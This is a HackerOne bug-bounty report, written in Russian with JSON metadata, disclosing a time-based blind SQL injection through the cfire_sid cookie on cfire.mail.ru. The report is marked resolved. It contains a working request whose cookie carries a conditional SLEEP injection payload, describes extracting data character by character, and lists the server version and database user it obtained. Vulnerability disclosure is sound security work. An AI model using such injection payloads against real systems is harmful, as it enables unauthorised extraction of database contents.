ID H1:107780
Type hackerone
Reporter konqi
Modified 2016-01-15T10:06:47
Description
Добрый день.
Уязвимо кукис с названием cfire_sid. Рабочий PoC
GET /account/userbar/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25
Host: cfire.mail.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: https://cfire.mail.ru/account/
Cookie: cfbb_lastvisit=1448331119; cfbb_lastactivity=0; cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),1,1)='c',SLEEP(3),1)%2b'; cfire_uid=14911677; sdcs=7H5SdDmbxCAVy4Be; pw_sms_pv=708a7; utma=148931300.1974397146.1448326349.1450489314.1451690206.4; __utmb=148931300.26.10.1451690206; __utmc=148931300; __utmz=148931300.1450146333.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site%3Acfire.mail.ru; partner_id=1_264_60149_0; __atuvc=27%7C0; __atuvs=568708d9dcea1dd901a; p=/2IAAOfiTQAA; mrcu=775B5682C0962E7E43C49BD79D25; _ym_uid=1451409559153734271; i=AQAl8oRWAgATAAglDDwAAT4AAT8AAVQAAXIDAf8DAVQEAaQEAV4FAVkGAuwHAUgIAU4CCAQB7QEB; PHPSESSID=*; iid=139613474; hasflash=false; flashless=false; _ym_isad=0; _ga=GA1.2.1435233556.1451417862; b=oEECAHB0YwQAI/Zko04GYOyEnYpgElUAhAkAAAj9iOZA9C/O1mBmUxYC; searchuid=976077651416940799; t_100451_67_0=1; t_0=1; _es=5a7278bb7415473c9cdc99a2a2a625f1.oJ0woigYlfky5-mVqm7dG2doZCs; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAACAAAMDzAcA; mr1lad=568708d960efc1ac-0-0-; Mpop=****; mc2=cfire.mail.ru; _ym_visorc_26627847=w; VID=1X9ciD0SjkXQ0000030614HQ::
Connection: Keep-Alive
С помощью посимвольного перебора можно экстрактить данные.
cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),1,1)='c',SLEEP(3),1)%2b' - true (sleeps 3 sec)
cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),2,1)='x',SLEEP(3),1)%2b'
Полученные данные для демонстрации уязвимости.
Версия сервера MySQL - 5.5.40
Имя Пользователя - cfire@172.16.17.54
{"id": "H1:107780", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Mail.ru: [cfire.mail.ru] Time Based SQL Injection", "description": "\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e \u043a\u0443\u043a\u0438\u0441 \u0441 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c cfire_sid. \u0420\u0430\u0431\u043e\u0447\u0438\u0439 PoC\n\nGET /account/userbar/ HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25\nHost: cfire.mail.ru\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\nAccept-Encoding: gzip, deflate\nReferer: https://cfire.mail.ru/account/\nCookie: cfbb_lastvisit=1448331119; cfbb_lastactivity=0; cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),1,1)='c',SLEEP(3),1)%2b'; cfire_uid=14911677; sdcs=7H5SdDmbxCAVy4Be; pw_sms_pv=708a7; __utma=148931300.1974397146.1448326349.1450489314.1451690206.4; __utmb=148931300.26.10.1451690206; __utmc=148931300; __utmz=148931300.1450146333.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site%3Acfire.mail.ru; partner_id=1_264_60149_0__; __atuvc=27%7C0; __atuvs=568708d9dcea1dd901a; p=/2IAAOfiTQAA; mrcu=775B5682C0962E7E43C49BD79D25; _ym_uid=1451409559153734271; i=AQAl8oRWAgATAAglDDwAAT4AAT8AAVQAAXIDAf8DAVQEAaQEAV4FAVkGAuwHAUgIAU4CCAQB7QEB; PHPSESSID=*********; iid=139613474; hasflash=false; flashless=false; _ym_isad=0; _ga=GA1.2.1435233556.1451417862; b=oEECAHB0YwQAI/Zko04GYOyEnYpgElUAhAkAAAj9iOZA9C/O1mBmUxYC; searchuid=976077651416940799; t_100451_67_0=1; t_0=1; _es=5a7278bb7415473c9cdc99a2a2a625f1.oJ0woigYlfky5-mVqm7dG2doZCs; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAACAAAMDzAcA; mr1lad=568708d960efc1ac-0-0-; Mpop=******; mc2=cfire.mail.ru; _ym_visorc_26627847=w; VID=1X9ciD0SjkXQ0000030614HQ::\nConnection: Keep-Alive\n\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u0441\u0438\u043c\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u0442\u0440\u0430\u043a\u0442\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435.\n\n cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),1,1)='c',SLEEP(3),1)%2b' - true (sleeps 3 sec)\n cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),2,1)='x',SLEEP(3),1)%2b'\n\n\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\u0412\u0435\u0440\u0441\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430 MySQL - 5.5.40\n\u0418\u043c\u044f \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f - cfire@172.16.17.54", "published": "2016-01-02T01:46:46", "modified": "2016-01-15T10:06:47", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/107780", "reporter": "konqi", "references": [], "cvelist": [], "lastseen": "2018-11-23T14:56:20", "viewCount": 14, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-11-23T14:56:20", "rev": 2}, "dependencies": {"references": [], "modified": "2018-11-23T14:56:20", "rev": 2}, "vulnersScore": -0.4}, "bounty": 150.0, "bountyState": "resolved", "h1team": {"handle": "mailru", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/065/07da688e1d8801d35fdb85376bd9d64e424e6dab_medium.png?1542897520", "small": "https://profile-photos.hackerone-user-content.com/000/000/065/b5353ff7c53e16da116c7f4e73cc5687ec7d8809_small.png?1542897520"}, "url": "https://hackerone.com/mailru"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/041/816/7a97279711288c80bd4dddcefb5cd6adebfc148b_small.jpg?1450095894"}, "url": "/konqi", "username": "konqi"}}
{}
